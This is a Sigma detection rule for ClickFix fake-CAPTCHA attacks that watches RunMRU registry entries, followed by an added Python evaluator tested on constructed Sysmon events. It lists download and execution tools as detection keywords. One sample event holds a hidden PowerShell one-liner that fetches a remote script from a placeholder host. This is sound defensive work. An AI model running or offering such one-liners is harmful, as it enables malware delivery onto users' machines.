Potential ClickFix Execution Pattern - Registry
Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.
Sigma rule

```yaml
title: Potential ClickFix Execution Pattern - Registry
id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
status: experimental
description: |
    Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
    ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
    Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
    such as one-liners that execute remotely hosted malicious files or scripts.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
    - https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724
    - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
    - https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-25
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: registry_set
    product: windows
detection:
    selection_registry:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\'
    selection_details:
        Details|contains:
            - 'http://'
            - 'https://'
    selection_susp_pattern:
        - Details|contains:
              # Add more suspicious keywords
              - 'account'
              - 'anti-bot'
              - 'botcheck'
              - 'captcha'
              - 'challenge'
              - 'confirmation'
              - 'fraud'
              - 'human'
              - 'identificator'
              - 'identity'
              - 'robot'
              - 'validation'
              - 'verification'
              - 'verify'
        - Details|contains:
              - '%comspec%'
              - 'bitsadmin'
              - 'certutil'
              - 'cmd'
              - 'cscript'
              - 'curl'
              - 'mshta'
              - 'powershell'
              - 'pwsh'
              - 'regsvr32'
              - 'rundll32'
              - 'schtasks'
              - 'wget'
              - 'wscript'
    condition: all of selection_*
falsepositives:
    - Legitimate applications using RunMRU with HTTP links
level: high
```
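To see how the three selections combine on real telemetry, here is an added Python evaluator (not part of the rule or the Sigma project) that applies the rule's logic to constructed Sysmon registry_set events; the SID, domains and RunMRU value names are placeholders. Note that Sigma combines a list of maps inside one selection with OR, so `selection_susp_pattern` fires on a lure keyword or an execution keyword, which is exactly why the listed false positive (a benign URL with "account" in its path) matches.

```python
# Added example (not from the rule or the Sigma project): evaluates the rule's
# selections against constructed Sysmon Event ID 13 (registry_set) fields.
# Sigma's `contains` is case-insensitive, and a YAML list of maps under one
# selection (selection_susp_pattern) is OR-combined: lure OR execution keyword.
RUNMRU_PATH = "\\software\\microsoft\\windows\\currentversion\\explorer\\runmru\\"
URL_SCHEMES = ("http://", "https://")
LURE_KEYWORDS = ("account", "anti-bot", "botcheck", "captcha", "challenge",
                 "confirmation", "fraud", "human", "identificator", "identity",
                 "robot", "validation", "verification", "verify")
EXEC_KEYWORDS = ("%comspec%", "bitsadmin", "certutil", "cmd", "cscript", "curl",
                 "mshta", "powershell", "pwsh", "regsvr32", "rundll32",
                 "schtasks", "wget", "wscript")

def evaluate(event: dict) -> dict:
    """Return each selection's result plus the final verdict for one event."""
    target = event.get("TargetObject", "").lower()
    details = event.get("Details", "").lower()
    result = {
        "selection_registry": RUNMRU_PATH in target,
        "selection_details": any(s in details for s in URL_SCHEMES),
        "selection_susp_pattern": (any(k in details for k in LURE_KEYWORDS)
                                   or any(k in details for k in EXEC_KEYWORDS)),
    }
    result["match"] = all(result.values())  # condition: all of selection_*
    return result

def triage(events: dict) -> list:
    """Names of the events the rule would alert on, sorted."""
    return sorted(name for name, ev in events.items() if evaluate(ev)["match"])

# Constructed sample events (placeholder SID); RunMRU value data carries the
# trailing "\1" that Windows appends and Sysmon records in Details.
RUNMRU_KEY = "HKU\\S-1-5-21-PLACEHOLDER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\"
SAMPLE_EVENTS = {
    # Pasted one-liner of the kind the rule describes: LOLBin + URL + lure text.
    "clickfix_like": {"TargetObject": RUNMRU_KEY + "a",
                      "Details": "powershell -w hidden iwr https://example.invalid/"
                                 "verify.ps1 # I am not a robot\\1"},
    # A URL typed into Run just opens the browser; no keyword, so no alert.
    "plain_url": {"TargetObject": RUNMRU_KEY + "b",
                  "Details": "https://www.example.com/\\1"},
    # LOLBin without a URL fails selection_details.
    "no_url": {"TargetObject": RUNMRU_KEY + "c", "Details": "powershell\\1"},
    # Benign URL whose path contains a lure keyword: the stated false positive.
    "account_portal": {"TargetObject": RUNMRU_KEY + "d",
                       "Details": "https://portal.example.com/account/login\\1"},
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(f"{name:15s} {evaluate(ev)}")
```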